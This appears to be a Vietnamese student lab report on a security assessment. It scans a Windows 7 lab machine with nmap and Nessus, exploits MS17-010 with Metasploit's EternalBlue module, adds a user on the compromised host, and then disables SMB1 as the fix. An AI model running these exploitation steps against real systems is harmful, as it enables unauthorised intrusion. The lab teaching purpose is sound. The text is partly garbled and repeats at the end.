Báo cáo tập kỳ Đánh giá kiểm định ATHTTT Bài 1.1 Sơ đồ mạng 1: Mô tả: Sơ đồ gồm máy Kali Linux Windows cấu hình IP hình 1.2 Cấu hình IP: - Kali Linux: - Windows 7: 1.3 Kiểm tra dịch vụ điểm yếu 1.3.1 Sử dụng nmap: Tại máy Kali Linux, thực kiểm tra dịch vụ cổng mở máy Windows cách sử dụng nmap Vào Terminal, nhập cú pháp lệnh: Nmap –sT –p1-1024 –O –v 10.0.0.10 - Sử dụng nessus: Truy cập vào đường dẫn https://localhost:8834 thực tạo tiến trình scan cách chọn scan -> Advanced Scan nhập thông tin host Sau save lại thực khởi động tiến trình Scan Sau scan xong click vào host để xem chi tiết lỗ hổng 1.4 Khai thác điểm yếu: Trên máy Kali Linux, thực khởi chạy công cụ Metasploits cách vào Terminal nhập: sudo msfdb init && msfconsole Như ta thấy có lỗ hổng bảo mật MS17-010, MS16-047, … để kiểm tra lỗi MS17-010 dùng lệnh search ms17-010 Tiến hành khai thác dựa kịch khai thác điểm yếu MS17-010 metasploits: Use exploit/windows/smb/ms17_010_eternalblue Set địa máy Windows lệnh set RHOST 10.0.0.10 Sau dùng lệnh exploit để bắt đầu khai thác Kết vào cmd Windows 7, kiểm tra IP lệnh ipconfig Danh sách User Windows 7: Tiến hành tạo thêm user Windows Kali Linux Sau tạo xong Windows có thêm User tên phamminhkhoi 1.5 Nguyên nhân cách khắc phục Lỗ hổng MS17-010 giao thức SMB gây nên tắt giao thức SMB cách: - Mở regedit vào đường dẫn sau: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServe r\Parameters Tạo giá trị vào bên Parameter cách chuột phải vào Parameters chọn New > DWORD (32-bit) Value Đặt tên giá trị tạo SMB1 Sau khởi động lại máy Scan lại Nessus thấy khơng cịn lỗ hổng MS17010 Bài 2: ... Value Đặt tên giá trị tạo SMB1 Sau khởi động lại máy Scan lại Nessus thấy khơng cịn lỗ hổng MS17010 Bài 2: